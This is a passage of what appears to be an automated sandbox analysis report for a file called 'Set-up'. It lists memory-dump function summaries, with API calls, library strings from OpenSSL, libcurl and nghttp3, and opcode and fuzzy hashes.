                            • Associated: 00000000.00000002.1770954730.0000000000CDF000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770974186.0000000000CE3000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770990476.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771095630.0000000000E3D000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771095630.0000000000E41000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771135773.0000000000E42000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771152847.0000000000E46000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_800000_Set-up.jbxd
                            Similarity
                            • API ID: ErrorLast$strcpystrlen
                            • String ID: crypto/err/err_local.h
                            • API String ID: 542397150-344804083
                            • Opcode ID: fefa955f7094c8abbcba2cc7e3e6a4e6f0c4f011c829f813b6a9bc0a9dcd8b28
                            • Instruction ID: c90c8c90c155fcf0db7fa09b15980f42c333a87f244647dbf5f20f6da2f10ad8
                            • Opcode Fuzzy Hash: fefa955f7094c8abbcba2cc7e3e6a4e6f0c4f011c829f813b6a9bc0a9dcd8b28
                            • Instruction Fuzzy Hash: B68186B1900B01AFE7239F28E985BE3B7E8FB4431CF444D19E5D5872A5DB79A418CB50
                            APIs
                              • Part of subcall function 008073F0: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,#HttpOnly_,?,0080CA95,00CEAB98,00000467,mprintf.c), ref: 0080741D
                              • Part of subcall function 008073F0: memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(-00000008,?,00000001), ref: 00807445
                              • Part of subcall function 008447D0: fgets.API-MS-WIN-CRT-STDIO-L1-1-0(00000080,00000080,?), ref: 008447FB
                              • Part of subcall function 008447D0: strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 0084480C
                              • Part of subcall function 008447D0: feof.API-MS-WIN-CRT-STDIO-L1-1-0(?), ref: 00844837
                            • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000001), ref: 00806844
                            • memcmp.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,unlimited,0000000A), ref: 00806876
                            • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?), ref: 008068FD
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1770554454.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                            • Associated: 00000000.00000002.1770534610.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770881763.0000000000C9B000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770881763.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770921729.0000000000CDB000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770937136.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770954730.0000000000CDF000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770974186.0000000000CE3000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770990476.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771095630.0000000000E3D000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771095630.0000000000E41000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771135773.0000000000E42000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771152847.0000000000E46000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_800000_Set-up.jbxd
                            Similarity
                            • API ID: strlen$feoffgetsmemcmpmemcpy
                            • String ID: %256s "%64[^"]"$hsts.c$unlimited
                            • API String ID: 288886899-2895786126
                            • Opcode ID: d3497e5b143f9f68cb3b2852534b9ad70fe96eae11f8b3702cd10d79b34e028b
                            • Instruction ID: e4478203eae0ad9e8e2d4b17498357f939412b4b311f87dfde20f35bc80ad20b
                            • Opcode Fuzzy Hash: d3497e5b143f9f68cb3b2852534b9ad70fe96eae11f8b3702cd10d79b34e028b
                            • Instruction Fuzzy Hash: 195118B1D443517BE760AB249C42A6B76D8FF95704F148838F848D62C2FA71EA34C793
                            APIs
                            • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,00000001,009F9265,?,00000400,00000000,?), ref: 009F8254
                            • memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,?,009F9265,?), ref: 009F8264
                            • memset.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000,009F9265,?,?,?,?,?,?,009F9265,?,00000400,00000000,?), ref: 009F82C7
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1770554454.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                            • Associated: 00000000.00000002.1770534610.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770881763.0000000000C9B000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770881763.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770921729.0000000000CDB000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770937136.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770954730.0000000000CDF000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770974186.0000000000CE3000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770990476.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771095630.0000000000E3D000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771095630.0000000000E41000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771135773.0000000000E42000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771152847.0000000000E46000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_800000_Set-up.jbxd
                            Similarity
                            • API ID: memcpymemsetstrlen
                            • String ID: Enter PEM pass phrase:$PEM_def_callback$crypto/pem/pem_lib.c
                            • API String ID: 160209724-3271887637
                            • Opcode ID: 90d9e8ec41bbb7ce5b0537b1d1dcc6fcf4724c789496111ea63ca07bdfd7a2ca
                            • Instruction ID: 6ab2fb17f62b1793c516bea7c67842b28ca1569af419c41289bb59aa8d46a6e7
                            • Opcode Fuzzy Hash: 90d9e8ec41bbb7ce5b0537b1d1dcc6fcf4724c789496111ea63ca07bdfd7a2ca
                            • Instruction Fuzzy Hash: BB01F9A27042103BE12079646C83F7B6A8CCBC17A4F040535FE14921C2FE51EC0952B2
                            APIs
                            • malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 008A895D
                            • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 008A8991
                            • _fileno.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 008A899A
                            • _write.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 008A89AB
                            • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 008A89B4
                            • abort.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 008A89B9
                            Memory Dump Source
                            • Source File: 00000000.00000002.1770554454.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                            • Associated: 00000000.00000002.1770534610.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770881763.0000000000C9B000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770881763.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770921729.0000000000CDB000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770937136.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770954730.0000000000CDF000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770974186.0000000000CE3000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770990476.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771095630.0000000000E3D000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771095630.0000000000E41000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771135773.0000000000E42000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771152847.0000000000E46000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_800000_Set-up.jbxd
                            Similarity
                            • API ID: __acrt_iob_func_fileno_writeabortfreemalloc
                            • String ID:
                            • API String ID: 1064163434-0
                            • Opcode ID: 983199f422e571383ac75fdf50c77b970d704799ce9f8e0aa1f1628bb791fc6e
                            • Instruction ID: 4d622e9834f99ed53d1520c350ed96d0f52eeffeef657060c1eea57b4d68ac18
                            • Opcode Fuzzy Hash: 983199f422e571383ac75fdf50c77b970d704799ce9f8e0aa1f1628bb791fc6e
                            • Instruction Fuzzy Hash: 7B1183B44093119FD300AF2AC58462AFAE4BF89740F45881DE5C493311EB7498458B63
                            APIs
                            • _initialize_narrow_environment.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00B88928
                            • _configure_narrow_argv.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,0080115A), ref: 00B8893D
                            • __p___argc.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,0080115A), ref: 00B88942
                            • __p___argv.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,0080115A), ref: 00B8894F
                            • __p__environ.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,0080115A), ref: 00B8895C
                            • _set_new_mode.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,0080115A), ref: 00B88972
                            Memory Dump Source
                            • Source File: 00000000.00000002.1770554454.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                            • Associated: 00000000.00000002.1770534610.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770881763.0000000000C9B000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770881763.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770921729.0000000000CDB000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770937136.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770954730.0000000000CDF000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770974186.0000000000CE3000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770990476.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771095630.0000000000E3D000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771095630.0000000000E41000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771135773.0000000000E42000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771152847.0000000000E46000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_800000_Set-up.jbxd
                            Similarity
                            • API ID: __p___argc__p___argv__p__environ_configure_narrow_argv_initialize_narrow_environment_set_new_mode
                            • String ID:
                            • API String ID: 3593706420-0
                            • Opcode ID: 1efc63e94736ec762dde092320e3d59adf545601741b22b2780315d7096a2df3
                            • Instruction ID: 1e437abdf192b325fc2ce43094dbe64a941acb431881dc0ad6ef84cab0688923
                            • Opcode Fuzzy Hash: 1efc63e94736ec762dde092320e3d59adf545601741b22b2780315d7096a2df3
                            • Instruction Fuzzy Hash: 81F0B2786147408FC710BF78C48181A77E1EF9A318F904AA8F9909B3B6DB35E941DF52
                            APIs
                            • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,00000000,00000000,?,?,00835B6B,00000017,?,?), ref: 00864612
                            • memchr.API-MS-WIN-CRT-PRIVATE-L1-1-0(0123456789abcdef,?,00000011), ref: 00864660
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1770554454.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                            • Associated: 00000000.00000002.1770534610.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770881763.0000000000C9B000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770881763.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770921729.0000000000CDB000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770937136.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770954730.0000000000CDF000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770974186.0000000000CE3000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770990476.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771095630.0000000000E3D000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771095630.0000000000E41000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771135773.0000000000E42000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771152847.0000000000E46000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_800000_Set-up.jbxd
                            Similarity
                            • API ID: _errnomemchr
                            • String ID: 0123456789ABCDEF$0123456789abcdef
                            • API String ID: 4119152314-885041942
                            • Opcode ID: 4081315b5fbeb01c332febba6b45b01ca678a9e64429da349662568771f21726
                            • Instruction ID: 6a7e7fcd69e192e66f82386eb2bbd480240059352770c1289846afb6e215b853
                            • Opcode Fuzzy Hash: 4081315b5fbeb01c332febba6b45b01ca678a9e64429da349662568771f21726
                            • Instruction Fuzzy Hash: 4D911471A083498BD728DE29C8402BEB7D2FFD6314F1A9A2DE8D5C7381DB759D848742
                            APIs
                            • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 0085225F
                            • _time64.API-MS-WIN-CRT-TIME-L1-1-0(00000000), ref: 008522CF
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1770554454.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                            • Associated: 00000000.00000002.1770534610.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770881763.0000000000C9B000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770881763.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770921729.0000000000CDB000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770937136.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770954730.0000000000CDF000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770974186.0000000000CE3000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770990476.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771095630.0000000000E3D000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771095630.0000000000E41000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771135773.0000000000E42000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771152847.0000000000E46000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_800000_Set-up.jbxd
                            Similarity
                            • API ID: _time64strlen
                            • String ID: :%u$Hostname in DNS cache does not have needed family, zapped$Hostname in DNS cache was stale, zapped
                            • API String ID: 3014104814-1335658360
                            • Opcode ID: 729110da5c4d90eed4cbbb39c84542f3f7e7b8564e91e970ab28564e48741fcc
                            • Instruction ID: f1ec0f97b4087c26a0c9855ba1c62eee5da2b8a0b8dfdcd275e77e94ed078d8d
                            • Opcode Fuzzy Hash: 729110da5c4d90eed4cbbb39c84542f3f7e7b8564e91e970ab28564e48741fcc
                            • Instruction Fuzzy Hash: A44105716003045BD724AA28DC85BBBB7D5FF85315F08443CEE8AC7392EA35AC49C752
                            APIs
                            • _assert.API-MS-WIN-CRT-RUNTIME-L1-1-0(ctx->next_absidx > absidx,nghttp3_qpack.c,000008B6,?,?,008B0307,?), ref: 008B07AE
                            • _assert.API-MS-WIN-CRT-RUNTIME-L1-1-0(ctx->next_absidx - absidx - 1 < nghttp3_ringbuf_len(&ctx->dtable),nghttp3_qpack.c,000008B7,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 008B07C3
                            Strings
                            • ctx->next_absidx - absidx - 1 < nghttp3_ringbuf_len(&ctx->dtable), xrefs: 008B07BE
                            • ctx->next_absidx > absidx, xrefs: 008B07A9
                            • nghttp3_qpack.c, xrefs: 008B07A4, 008B07B9
                            Memory Dump Source
                            • Source File: 00000000.00000002.1770554454.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                            • Associated: 00000000.00000002.1770534610.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770881763.0000000000C9B000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770881763.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770921729.0000000000CDB000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770937136.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770954730.0000000000CDF000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770974186.0000000000CE3000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770990476.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771095630.0000000000E3D000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771095630.0000000000E41000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771135773.0000000000E42000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771152847.0000000000E46000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_800000_Set-up.jbxd
                            Similarity
                            • API ID: _assert
                            • String ID: ctx->next_absidx - absidx - 1 < nghttp3_ringbuf_len(&ctx->dtable)$ctx->next_absidx > absidx$nghttp3_qpack.c
                            • API String ID: 1222420520-241347991
                            • Opcode ID: 0e2f33c2a4d3aa26273d6ec9757a40351b3afe5905d45aaa900130ae8c0cbde1
                            • Instruction ID: b5fb6382032dbde28c2b9db1397530435284d44c8da0a64f2f03cbd2693af17f
                            • Opcode Fuzzy Hash: 0e2f33c2a4d3aa26273d6ec9757a40351b3afe5905d45aaa900130ae8c0cbde1
                            • Instruction Fuzzy Hash: 5E31D375700704AFE310AA68DC81E6BB395FF89714F04852CF44AD7782EB21B8458BE2
                            APIs
                            • _stat64.API-MS-WIN-CRT-FILESYSTEM-L1-1-0(00815FB6,?), ref: 00B84645
                            • _stat64.API-MS-WIN-CRT-FILESYSTEM-L1-1-0(../list/public_suffix_list.dat,?), ref: 00B84698
                            • fopen.API-MS-WIN-CRT-STDIO-L1-1-0(?,00DF2358), ref: 00B84744
                            • fclose.API-MS-WIN-CRT-STDIO-L1-1-0(00000000), ref: 00B84762
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1770554454.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                            • Associated: 00000000.00000002.1770534610.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770881763.0000000000C9B000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770881763.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770921729.0000000000CDB000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770937136.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770954730.0000000000CDF000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770974186.0000000000CE3000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770990476.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771095630.0000000000E3D000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771095630.0000000000E41000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771135773.0000000000E42000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771152847.0000000000E46000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_800000_Set-up.jbxd
                            Similarity
                            • API ID: _stat64$fclosefopen
                            • String ID: ../list/public_suffix_list.dat
                            • API String ID: 1085753941-141370353
                            • Opcode ID: e4b14bb77fa66c99a27a732ea3517ef152138eea4fe3d1632f5e48add9af53c1
                            • Instruction ID: 36f5fd99eebd04823828dacb5beb1f2a9747b6e8442bdaa8c543f627350cf5c2
                            • Opcode Fuzzy Hash: e4b14bb77fa66c99a27a732ea3517ef152138eea4fe3d1632f5e48add9af53c1
                            • Instruction Fuzzy Hash: F1419EB6A083469BC700EF14D48176AB7E5EB85744F15486CE9C9D7360E7B0ED48CB92
                            APIs
                            • _assert.API-MS-WIN-CRT-RUNTIME-L1-1-0(nghttp3_ksl_it_get(&it) == stream,nghttp3_qpack.c,000008ED,?,?,?,?,?,?,?,00000000,00000000,00000000,?,008AEF0E,?), ref: 008AEA23
                            • _assert.API-MS-WIN-CRT-RUNTIME-L1-1-0(!nghttp3_ksl_it_end(&it),nghttp3_qpack.c,000008EC,?,?,?,?,?,?,?,00000000,00000000,00000000,?,008AEF0E,?), ref: 008AEA38
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1770554454.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                            • Associated: 00000000.00000002.1770534610.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770881763.0000000000C9B000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770881763.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770921729.0000000000CDB000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770937136.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770954730.0000000000CDF000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770974186.0000000000CE3000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770990476.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771095630.0000000000E3D000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771095630.0000000000E41000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771135773.0000000000E42000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771152847.0000000000E46000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_800000_Set-up.jbxd
                            Similarity
                            • API ID: _assert
                            • String ID: !nghttp3_ksl_it_end(&it)$nghttp3_ksl_it_get(&it) == stream$nghttp3_qpack.c
                            • API String ID: 1222420520-1964160224
                            • Opcode ID: 9e453f72b92eda769cf1982cf1ed08b87a39ecd69a59f284b3ac5ca4a7faf0e2
                            • Instruction ID: 72496dc25d9cdf757fba2c5fe1a8285993f5747b22a3ef4719015d6549829a53
                            • Opcode Fuzzy Hash: 9e453f72b92eda769cf1982cf1ed08b87a39ecd69a59f284b3ac5ca4a7faf0e2
                            • Instruction Fuzzy Hash: 1131D372804709EFD714DF54DC81E9BB7B8FF96364F008919F8989B291E730A984C7A2
                            APIs
                            • _time64.API-MS-WIN-CRT-TIME-L1-1-0(00000000), ref: 00872771
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1770554454.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                            • Associated: 00000000.00000002.1770534610.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770881763.0000000000C9B000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770881763.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770921729.0000000000CDB000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770937136.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770954730.0000000000CDF000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770974186.0000000000CE3000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770990476.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771095630.0000000000E3D000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771095630.0000000000E41000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771135773.0000000000E42000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771152847.0000000000E46000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_800000_Set-up.jbxd
                            Similarity
                            • API ID: _time64
                            • String ID: Connection time-out$gfff$netascii$set timeouts for state %d; Total % lld, retry %d maxtry %d
                            • API String ID: 1670930206-2395985473
                            • Opcode ID: 3057cfff9ff55e797ed8ed89752a1ba0c24313f1aea0baf578b8e442f3a6cdf2
                            • Instruction ID: 05740073cc18dc1c149e9bb63deb43e8af8bc42d290a0de3fe579be7580d302b
                            • Opcode Fuzzy Hash: 3057cfff9ff55e797ed8ed89752a1ba0c24313f1aea0baf578b8e442f3a6cdf2
                            • Instruction Fuzzy Hash: 0021EAB1B003045FEB28AA29AD05B2775DAFBD4304F18853DF90EC72D6F975D8118752
                            APIs
                            • _assert.API-MS-WIN-CRT-RUNTIME-L1-1-0(veccnt > 0,nghttp3_stream.c,0000033D), ref: 008A6119
                            • _assert.API-MS-WIN-CRT-RUNTIME-L1-1-0(0 == offset,nghttp3_stream.c,00000349), ref: 008A612E
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1770554454.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                            • Associated: 00000000.00000002.1770534610.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770881763.0000000000C9B000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770881763.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770921729.0000000000CDB000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770937136.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770954730.0000000000CDF000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770974186.0000000000CE3000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770990476.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771095630.0000000000E3D000.00000004.00000001.01000000.00000003.sdmpDownload File
